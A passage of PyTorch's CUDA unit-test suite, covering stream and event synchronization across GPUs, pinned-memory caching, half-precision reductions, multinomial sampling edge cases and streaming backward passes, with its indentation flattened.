torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# exception if otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of parent and child threads execution time is greater than the
# real execution time by least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used to soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would cause overflow to negative value
# giving negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Test that wrap_with_cuda_memory_check successfully detects leak
def test_cuda_memory_leak_detection(self):
l = []
@self.wrap_with_cuda_memory_check
def no_leak():
pass
@self.wrap_with_cuda_memory_check
def leak_gpu0():
l.append(torch.tensor(10, device=torch.device("cuda:0")))
no_leak()
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 0"):
leak_gpu0()
if TEST_MULTIGPU:
@self.wrap_with_cuda_memory_check
def leak_gpu1():
l.append(torch.tensor(10, device=torch.device("cuda:1")))
with self.assertRaisesRegex(AssertionError, r"leaked \d+ bytes CUDA memory on device 1"):
leak_gpu1()
def test_cuda_memory_leak_detection_propagates_errors(self):
with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"):
with self.assertLeaksNoCudaTensors():
x = torch.randn(3, 1, device='cuda')
y = torch.randn(2, 1, device='cuda')
z = x + y
def test_trilu_indices(self):
for test_args in tri_tests_args:
_compare_trilu_indices(self, *test_args, device='cuda')
# test default options
x = torch.ones(
3, 3, dtype=torch.long, device='cuda', layout=torch.strided)
self.assertEqual(
x.tril(0).nonzero().transpose(0, 1),
torch.tril_indices(3, 3, device='cuda'))
self.assertEqual(
x.triu(0).nonzero().transpose(0, 1),
torch.triu_indices(3, 3, device='cuda'))
def test_large_trilu_indices(self):
for test_args in tri_large_tests_args:
_compare_large_trilu_indices(self, *test_args, device='cuda')
@unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow(self):
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**30]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**30], expected)
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_cuda_kernel_loop_overflow_large(self):
# Make sure input.numel() > INT_MAX is handled:
x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda")
with self.assertRaisesRegex(RuntimeError, "integer out of range"):
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
# Issue #24309: In extreme cases, the loop variable could overflow and continue
# the kernel loop with a negative index, causing a RuntimeError (invalid write):
x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda")
expected = x[0, 0, 0, 2**31 - 2]
y = torch.nn.functional.avg_pool2d(x, kernel_size=1)
torch.cuda.synchronize()
self.assertEqual(y[0, 0, 0, 2**31 - 2], expected)
# this might create a reference cycle on self...
def _make_multiply_in_stream(self):
class MultiplyInStream(torch.autograd.Function):
@staticmethod
def forward(ctx, x, val):
ctx.val = val
ctx.stream = torch.cuda.current_stream()
return x * val
@staticmethod
def backward(ctx, grad):
self.assertEqual(torch.cuda.current_stream(), ctx.stream)
# delays the operation in the the background stream
torch.cuda._sleep(1000 * 5000)
return grad * ctx.val, None
return MultiplyInStream
@skipCUDANonDefaultStreamIf(True)
def test_streaming_backwards_sync(self):
default_stream = torch.cuda.current_stream()
stream = torch.cuda.Stream()
MultiplyInStream = self._make_multiply_in_stream()
# Tests using grads outside the backward() stream context
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 2)
output.sum().backward()
# sync needed
default_stream.wait_stream(stream)
self.assertEqual(x.grad, torch.ones_like(x) * 2)
self.assertEqual(torch.cuda.current_stream(), default_stream)
# Tests that using grads in the same stream context as backward()
# is safe regardless what streams bwd ops ran on
bwd_ambient_stream = torch.cuda.Stream()
x = torch.randn(5, 5, device='cuda', requires_grad=True)
with torch.cuda.stream(stream):
stream.wait_stream(default_stream)
output = MultiplyInStream.apply(x, 3)
with torch.cuda.stream(bwd_ambient_stream):
bwd_ambient_stream.wait_stream(stream)
output.sum().backward()
# x was first used on "stream" so its AccumulateGrad leaf should run on "stream".
# The end of backward() should have synced "bwd_ambient_stream" with "stream"
# so it should be safe to use x.grad here without any syncs.
self.assertEqual(x.grad, torch.ones_like(x) * 3)
self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream)
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
def test_streaming_backwards_multiple_streams(self):
MultiplyInStream = self._make_multiply_in_stream()
class StreamModel(torch.nn.Module):
def __init__(self):
super(StreamModel, self).__init__()
self.event = torch.cuda.Event()
self.stream0 = torch.cuda.Stream()
self.stream1 = torch.cuda.Stream()
def forward(self, x, x_first_use_on_ambient):
if x_first_use_on_ambient:
x0 = x.clone()
self.stream0.wait_stream(torch.cuda.current_stream())
self.stream1.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(self.stream0):
if not x_first_use_on_ambient:
x0 = x.clone()
y0 = MultiplyInStream.apply(x0, 2)
self.event.record(stream=torch.cuda.current_stream())
with torch.cuda.stream(self.stream1):
y1 = MultiplyInStream.apply(x, 3)
self.stream1.wait_event(self.event)
return y0 + y1
stream = torch.cuda.Stream()
for x_first_use_on_ambient in (True, False):
# the out_of_place=False, iters=1 case stresses if proper syncs are inserted
# when grads are initially None and stolen by backward ops.
for out_of_place, iters in ((True, 1),
(False, 1),
(False, 5)):
with torch.cuda.stream(stream):
x = torch.randn(5, 5, device='cuda', requires_grad=True)
model = StreamModel().cuda()
x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(),
stream if x_first_use_on_ambient else model.stream0))
for p in model.parameters():
self.assertTrue(p.grad is None)
for i in range(iters):
loss = model(x, x_first_use_on_ambient).sum()
if out_of_place:
x_grad = torch.autograd.grad((loss,), (x,))[0]
else:
loss.backward()
# See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html
torch.cuda.current_stream().wait_stream(stream)
if out_of_place:
self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters)
else:
self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_streaming_backwards_device_transfer(self):
# This function must run with non-default current streams on all devices, otherwise it's meaningless.
# The intention is to test that to()'s backward (CopyBackward) interacts properly with the
# synchronization logic in torch/csrc/autograd/input_buffer.cpp.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
# Unfortunately I need to make the tensors largeish.
# Bigger tensors = longer D2D transfers = more likely to expose races.
size = 2**26
a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True)
# Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input.
# This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer.
to_backward_recipient = a * b
s = to_backward_recipient.to(device="cuda:0").sum()
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s.backward()
self.assertTrue(a.grad.sum().item() == size)
self.assertTrue(b.grad.sum().item() == size)
# Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs.
# This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer.
a.grad = None
b.grad = None
to_backward_recipient = a * b
# Multiply by 2 here so to's backward creates gradient values that are different from the case above,
# to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated
# with 1s by the case above
s0 = to_backward_recipient.to(device="cuda:0").sum() * 2.
s1 = to_backward_recipient.to(device="cuda:0").sum() * 2.
torch.cuda.synchronize(device=dev0)
torch.cuda.synchronize(device=dev1)
s0.backward(retain_graph=True)
s1.backward()
self.assertTrue(a.grad.sum().item() == 4 * size)
self.assertTrue(b.grad.sum().item() == 4 * size)
def test_streaming_backwards_sync_graph_root(self):
